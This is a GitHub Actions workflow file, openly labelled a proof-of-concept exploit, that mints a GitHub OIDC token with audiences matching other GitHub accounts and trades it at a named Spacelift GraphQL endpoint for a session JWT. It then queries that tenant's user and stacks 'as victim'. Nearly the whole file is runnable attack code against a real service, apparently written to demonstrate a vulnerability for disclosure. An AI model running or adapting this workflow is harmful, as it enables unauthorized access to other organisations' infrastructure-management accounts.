name: Spacelift OIDC Exploit PoC

on:
  workflow_dispatch:

permissions:
  id-token: write
  contents: read

jobs:
  exploit:
    runs-on: ubuntu-latest
    steps:
      - name: Get OIDC Token from GitHub
        id: token
        run: |
          # Try x46gamer first, then soufian3hm
          for AUDIENCE in "https://github.com/x46gamer" "https://github.com/soufian3hm"; do
            echo "Trying audience: $AUDIENCE"
            TOKEN=$(curl -s -H "Authorization: bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" \
              "${ACTIONS_ID_TOKEN_REQUEST_URL}&audience=${AUDIENCE}" | jq -r .value)
            
            if [ -n "$TOKEN" ] && [ "$TOKEN" != "null" ]; then
              echo "Got token for $AUDIENCE"
              echo "token=$TOKEN" >> $GITHUB_OUTPUT
              echo "audience=$AUDIENCE" >> $GITHUB_OUTPUT
              break
            fi
          done

      - name: Decode JWT (for proof)
        run: |
          TOKEN="${{ steps.token.outputs.token }}"
          echo "=== JWT Header ==="
          echo $TOKEN | cut -d. -f1 | base64 -d 2>/dev/null | jq . || true
          echo "=== JWT Payload ==="
          echo $TOKEN | cut -d. -f2 | base64 -d 2>/dev/null | jq . || true

      - name: Authenticate to Spacelift (THE EXPLOIT)
        run: |
          TOKEN="${{ steps.token.outputs.token }}"
          SPACELIFT="https://soufian3hm.app.spacelift.dev/graphql"
          
          echo "Attempting authentication to Spacelift..."
          
          RESPONSE=$(curl -s -X POST "$SPACELIFT" \
            -H "Content-Type: application/json" \
            -d "{\"query\": \"mutation { oauthUser(token: \\\"$TOKEN\\\") { jwt } }\"}")
          
          echo "Response: $RESPONSE"
          
          JWT=$(echo $RESPONSE | jq -r '.data.oauthUser.jwt // empty')
          
          if [ -n "$JWT" ]; then
            echo ""
            echo "=========================================="
            echo "  EXPLOIT SUCCESSFUL!"
            echo "  Got Spacelift JWT token!"
            echo "=========================================="
            echo ""
            
            echo "Testing authenticated access as victim..."
            curl -s -X POST "$SPACELIFT" \
              -H "Authorization: Bearer $JWT" \
              -H "Content-Type: application/json" \
              -d '{"query": "{ viewer { id name admin } stacks { id name } }"}' | jq .
          else
            echo "Failed - Error: $(echo $RESPONSE | jq -r '.errors[0].message // empty')"
          fi
